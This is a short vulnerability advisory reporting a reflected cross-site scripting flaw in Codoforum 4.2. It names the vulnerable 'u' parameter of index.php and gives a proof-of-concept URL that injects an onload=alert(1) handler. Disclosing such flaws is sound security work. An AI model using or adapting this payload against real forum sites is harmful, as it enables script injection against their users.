codoforum 4.2 XSS vulnerability (reflected)

========================================================================
| # Title     : codoforum 4.2 XSS vulnerability (reflected)
| # Author    : Mohamed diaa
| # email     : moha200@protonmail.com
| # Tested on : chrome - windows 7
| # Version   : 4.2
| # Vendor    : https://codoforum.com/
========================================================================
Request Method(s):
[+] GET
Vulnerable Function(s):
[+] index.php
Vulnerable Parameter(s):
[+] u
Proof of Concept (PoC):
========================
Cross-Site Scripting, also known as XSS, is one of the most common attacks carried out in web applications. 
The concept of XSS is to manipulate the client-side scripts of a web application to perform actions planned by a malicious user.
Reflected Cross-Site Scripting occurs when data sent by the attacker to the application is displayed on the page without the need to be stored somewhere.
[+] http://location/codoforum/index.php?u=%2fnaf3r%22%20onload%3dalert(1)%20vdkyo